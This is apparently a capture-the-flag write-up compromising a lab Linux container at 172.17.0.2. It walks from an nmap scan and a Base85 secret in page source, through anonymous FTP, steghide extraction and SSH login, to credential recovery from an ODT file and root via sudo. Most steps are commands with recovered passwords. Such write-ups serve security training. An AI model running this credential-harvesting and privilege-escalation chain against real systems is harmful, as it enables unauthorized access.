Fileception
This engagement involved compromising a Linux system through a combination of service enumeration, steganography analysis, and privilege escalation. The attack path exploited misconfigured services, weak credential storage practices, and excessive sudo privileges. Key vulnerabilities included anonymous FTP access, hidden data in image files, and insecure credential storage in base64 encoding.
1. Reconnaissance
nmap -p- 172.17.0.2
PORT STATE SERVICE
21/tcp open ftp # Anonymous access enabled
22/tcp open ssh # Potential SSH entry point
80/tcp open http # Web server for initial foothold
2. Web Server Analysis
2.1 Source Code Inspection
The web page source contained a critical comment via view-source:http://172.17.0.2/:
<!-- Base85 encoded secret: @UX=h?T9oMA7]7hA7]:YE+*g/GAhM4 -->
3. Cryptography Analysis
3.1 Base85 Identification
The encoded string exhibited characteristics of Ascii85 encoding:
| Characteristic | Base85 | Base64 |
|---|---|---|
| Symbol Usage | @, ], +, etc. | +, /, = |
| Length Compatibility | 30 (divisible by 5) | Requires padding |
| Commonality | Less prevalent | Widely used |
Eliminated Alternatives:
- Base32: No symbols, limited charset
- Base16: Hexadecimal characters only
3.2 Decoding Process
Python script using the a85decode method:
from base64 import a85decode
encoded = "@UX=h?T9oMA7]7hA7]:YE+*g/GAhM4"
decoded = a85decode(encoded, adobe=False).decode('utf-8')
# adobe=False: Disable Adobe-specific delimiters
print(decoded) # Output: base_85_decoded_password
4. FTP Exploitation
4.1 Anonymous Access
Using the decoded password for FTP authentication:
ftp anonymous@172.17.0.2 # Password: base_85_decoded_password
ftp> get hello_peter.jpg # Retrieve steganography carrier
5. Steganography Analysis
5.1 Data Extraction with Steghide
Extracted hidden data using the previously decoded password:
steghide extract -sf hello_peter.jpg
# Passphrase: base_85_decoded_password
# Output: you_find_me.txt
Extracted Data:
Ook!-encoded message (Decoded to: 9h889h23hhss2)
Tooling Note:
Ook! language is an esoteric programming language often used in steganography challenges. Decoded via dcode.fr's Ook! translator.
6. SSH Access & Lateral Movement
6.1 Credential Reuse
Obtained SSH access using the steganography-derived password:
ssh peter@172.17.0.2 # Password: 9h889h23hhss2
7. Privilege Escalation
7.1 File Discovery in /tmp
Found critical files via directory inspection:
ls -al /tmp
- importante_octopus.odt: ODT document (ZIP archive)
- recuerdos_del_sysadmin.txt: Red herring text file
7.2 File Type Exploitation
- Hosted file via Python HTTP server:
cd /tmp
python3 -m http.server 6666 - Retrieved and analyzed document structure:
wget http://$TARGET_IP:6666/importante_octopus.odt
file importante_octopus.odt # Identified as ZIP archive
unzip importante_octopus.zip -d extracted/ - Located credentials in
leerme.xml:usuario: octopus
password: ODBoMjM4MGgzNHVvdW8zaDQ= # Base64 encoded
7.3 Credential Decoding
echo "ODBoMjM4MGgzNHVvdW8zaDQ=" | base64 -d
# Output: 80h2380h34uouo3h4
7.4 Sudo Misconfiguration
sudo -l # Revealed unrestricted sudo access
sudo su # Gained root privileges
8. Vulnerability Chain Summary
| Step | Vulnerability Class | Impact |
|---|---|---|
| 1 | Anonymous FTP Access | Initial Foothold |
| 2 | Steganography Practices | Credential Exposure |
| 3 | Base64 Password Storage | Lateral Movement |
| 4 | Excessive Sudo Privileges | Privilege Escalation |